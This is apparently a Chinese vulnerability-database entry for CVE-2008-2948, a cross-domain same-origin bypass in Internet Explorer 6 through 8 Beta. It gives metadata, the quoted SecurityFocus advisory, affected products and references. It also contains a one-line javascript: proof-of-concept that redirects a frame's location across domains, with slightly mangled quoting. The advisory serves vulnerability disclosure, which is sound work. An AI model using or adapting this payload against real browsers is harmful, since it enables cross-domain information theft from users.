microsoft IE 7/8 框架位置属性 跨域漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115571 漏洞类型 其他
发布时间 2008-06-27 更新时间 2008-06-30
CVE编号 CVE-2008-2948 CNNVD-ID CNNVD-200806-435
漏洞平台 Windows CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/31996
https://www.securityfocus.com/bid/84919
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-435
|漏洞详情
MicrosoftInternetExplorer存在跨域(Cross-domain)漏洞。远程攻击者通过对象数据类型来改变框架的位置属性,并用一个不同域的画面来观测不受域限制的事件,例如用caballero-listener观测onkeydown事件。
|漏洞EXP
source: http://www.securityfocus.com/bid/29986/info

Microsoft Internet Explorer is prone to a cross-domain scripting security-bypass vulnerability because the application fails to properly enforce the same-origin policy.

An attacker can exploit this issue to change the location of a frame from a different domain. This allows the attacker to execute arbitrary code in a frame of the same window as content from a different domain. Successful exploits will allow the attacker to access information from the parent document via DOM components that are not domain-reliant (such as the 'onmousedown' event).

Internet Explorer 6, 7, and 8 Beta 1 are vulnerable; other versions may also be affected. 

javascript:x=open('http://example.com/');setInterval(function(){try{x.frames[0].location={toString:function(){return 
.http://www.example2.com/somescript.html.;}}}catch(e){}},5000);void(1);
|受影响的产品
Microsoft Internet Explorer Macintosh Edition 8 Microsoft Internet Explorer 7.0 + Microsoft Windows Server 2003 Sp2 X64 + Microsoft Windows Server
|参考资料

来源:US-CERT
名称:VU#516627
链接:http://www.kb.cert.org/vuls/id/516627
来源:MISC
链接:http://www.gnucitizen.org/blog/ghost-busters/
来源:VUPEN
名称:ADV-2008-1941
链接:http://www.frsirt.com/english/advisories/2008/1941/references
来源:MISC
链接:http://technet.microsoft.com/en-us/security/cc405107.aspx#EHD
来源:MISC
链接:http://sirdarckcat.blogspot.com/2008/05/ghosts-for-ie8-and-ie75730.html
来源:SECUNIA
名称:30851
链接:http://secunia.com/advisories/30851
来源:MISC
链接:http://blogs.zdnet.com/security/?p=1348